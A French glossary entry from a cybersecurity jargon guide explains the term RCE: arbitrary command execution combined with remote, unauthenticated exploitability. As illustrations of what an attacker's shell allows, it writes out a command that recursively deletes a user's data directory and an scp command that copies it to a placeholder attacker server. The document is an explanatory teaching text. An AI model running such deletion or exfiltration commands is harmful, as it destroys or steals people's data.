Le jargon en cybersécurité

RCE

Remote Command Execution (Exécution de commandes à distance). Cela s’utilise pour décrire une vulnérabilité permettant de compromettre complètement une cible à distance.

Nous avons expliqué que les vulnérabilités peuvent avoir des impacts différents. Parfois peu graves : on peut changer la couleur du profil d’un autre utilisateur. Parfois très graves : on peut provoquer une virement bancaire sur le compte d’un autre utilisateur.

Nous avons expliqué que «compromettre une cible» signifie «avoir le contrôle total de cette cible».
Toutes les vulnérabilités ne sont pas suffisamment graves pour permettre de compromettre la cible qu’elles affectent.

Il y a une classe de vulnérabilités dont les impacts sont très graves : c’est celle où le pirate obtient un accès à une interface de commande de la cible. Une telle interface se nomme un terminal (ou un shell en anglais) et permet de ... tout faire.
Vous voulez supprimer des données ? Vous tapez la commande rm -rf /data/user01/ dans cette interface. Vous voulez voler ces données ? Vous tapez la commande scp -r /data/user01 root@serveurpirate.fr:. Vous voulez changer la langue du système ? Vous tapez echo FR-fr > /etc/locale/locale.conf.
Bref tout ce qu’il est possible de faire sur un ordinateur (que ce soit en 1 ou 10 clics), vous pouvez le faire aussi avec cette interface.

Dans ce cas, plutôt que de décrire l’infinité des malversations que pourrait imaginer le pirate (vol de données, altération de données, destruction de données, altération du comportement du service, détournement d’usage, usurpation d’identité, ...) on utilise un terme générique : exécution de commandes arbitraires (arbitrary command execution en anglais).
Ça veut dire que le pirate peut faire ce qu’il veut.

Mais l’autre dimension déterminante d’une vulnérabilité, c’est son exploitabilité : est-ce que c’est facile/difficile à exploiter ? Est-ce qu’il faut être connecté sur la machine ou peut-on le faire sans compte ? Est-ce qu’on peut l’exploiter depuis Internet ou bien seulement depuis le poste vulnérable ? Etc.
Le cas le plus grave, c’est quand c’est exploitable depuis tout Internet (puisque vous avez alors 4 milliards d’adversaires potentiels) et qu’il n’y a pas besoin d’avoir de compte. On appelle cette configuration Remote Unauthenticated (il n’y a pas de traduction communément utilisée en français mais ça se traduirait par «à distance, non authentifié»).

Et donc, quand on combine l’impact le plus grave possible (arbitrary command execution) avec l’exploitabilité la plus dangereuse (remote unauthenticated) on appelle ça Remote Command Execution (parce que ce serait long d’écrire remote unauthenticated arbitrary command execution).
La blague quand on essaye d’expliquer en quelques mots ce qu’est une RCE c’est de dire : «c’est quand ton ordinateur, c’est plus ton ordinateur». Pour expliquer que c’est quand le pirate a le contrôle total de ta machine.

«Deux RCE ont été trouvées sur Windows 10» : deux vulnérabilités viennent d’être rendue publiques, elles affectent Windows 10 et permette à un adversaire depuis Internet d’obtenir le contrôle total du système.

«J’ai RCE le serveur ERP» : j’ai trouvé une vulnérabilité permettant d’obtenir le contrôle total du serveur ERP, à distance.

← Terme précédentSommaireTerme suivant →